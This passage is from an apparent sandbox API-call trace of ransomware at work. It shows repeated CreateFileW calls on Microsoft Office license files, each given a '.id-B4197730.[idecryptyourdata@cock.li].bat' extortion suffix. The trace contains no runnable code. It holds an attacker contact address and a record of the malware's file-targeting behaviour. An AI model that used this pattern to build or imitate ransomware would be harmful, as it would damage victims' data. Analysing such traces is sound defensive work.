lpNewFilePointer=0x0) returned 1 [0164.586] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.586] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_KMS_Client-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_kms_client-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.587] CloseHandle (hObject=0x434) returned 1 [0164.587] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.587] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_KMS_Client-ul.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_kms_client-ul.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.588] CloseHandle (hObject=0x434) returned 1 [0164.588] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.588] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_MAK-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_mak-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.588] CloseHandle (hObject=0x434) returned 1 [0164.589] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.589] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.589] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_MAK-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_mak-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.590] CloseHandle (hObject=0x434) returned 1 [0164.591] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.591] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_MAK-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_mak-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.591] CloseHandle (hObject=0x434) returned 1 [0164.592] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.592] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_MAK-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_mak-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.592] CloseHandle (hObject=0x434) returned 1 [0164.593] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.593] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_Subscription-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subscription-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.594] CloseHandle (hObject=0x434) returned 1 [0164.595] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.595] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_Subscription-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subscription-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.595] CloseHandle (hObject=0x434) returned 1 [0164.596] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.596] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_Subscription-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subscription-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.596] CloseHandle (hObject=0x434) returned 1 [0164.597] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.597] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTest-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtest-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.597] CloseHandle (hObject=0x434) returned 1 [0164.598] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.598] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTest-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtest-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.599] CloseHandle (hObject=0x434) returned 1 [0164.600] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.600] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTest-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtest-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.600] CloseHandle (hObject=0x434) returned 1 [0164.601] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.601] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTrial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtrial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.602] CloseHandle (hObject=0x434) returned 1 [0164.602] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.603] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTrial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtrial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.603] CloseHandle (hObject=0x434) returned 1 [0164.604] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.604] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTrial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtrial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.604] CloseHandle (hObject=0x434) returned 1 [0164.605] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.605] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_Subscription-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subscription-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.606] CloseHandle (hObject=0x434) returned 1 [0164.606] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.606] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_Subscription-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subscription-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.607] CloseHandle (hObject=0x434) returned 1 [0164.607] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.607] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.607] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_Subscription-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subscription-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.607] CloseHandle (hObject=0x434) returned 1 [0164.608] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.608] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTest-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtest-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.608] CloseHandle (hObject=0x434) returned 1 [0164.609] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.609] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTest-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtest-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.610] CloseHandle (hObject=0x434) returned 1 [0164.611] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.611] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.611] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTest-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtest-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.611] CloseHandle (hObject=0x434) returned 1 [0164.612] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.612] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.612] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTrial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtrial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.612] CloseHandle (hObject=0x434) returned 1 [0164.613] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.613] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.613] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTrial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtrial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.613] CloseHandle (hObject=0x434) returned 1 [0164.614] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.614] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTrial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtrial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.614] CloseHandle (hObject=0x434) returned 1 [0164.615] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.615] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.615] CloseHandle (hObject=0x434) returned 1 [0164.616] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.616] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.979] CloseHandle (hObject=0x434) returned 1 [0165.477] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.477] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.477] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessentryr_prepidbypass-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.478] CloseHandle (hObject=0x52c) returned 1 [0165.481] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.481] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.481] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.481] CloseHandle (hObject=0x52c) returned 1 [0165.482] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.482] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.482] CloseHandle (hObject=0x52c) returned 1 [0165.483] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.483] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.484] CloseHandle (hObject=0x52c) returned 1 [0165.485] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.485] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.487] CloseHandle (hObject=0x52c) returned 1 [0165.489] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.489] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, 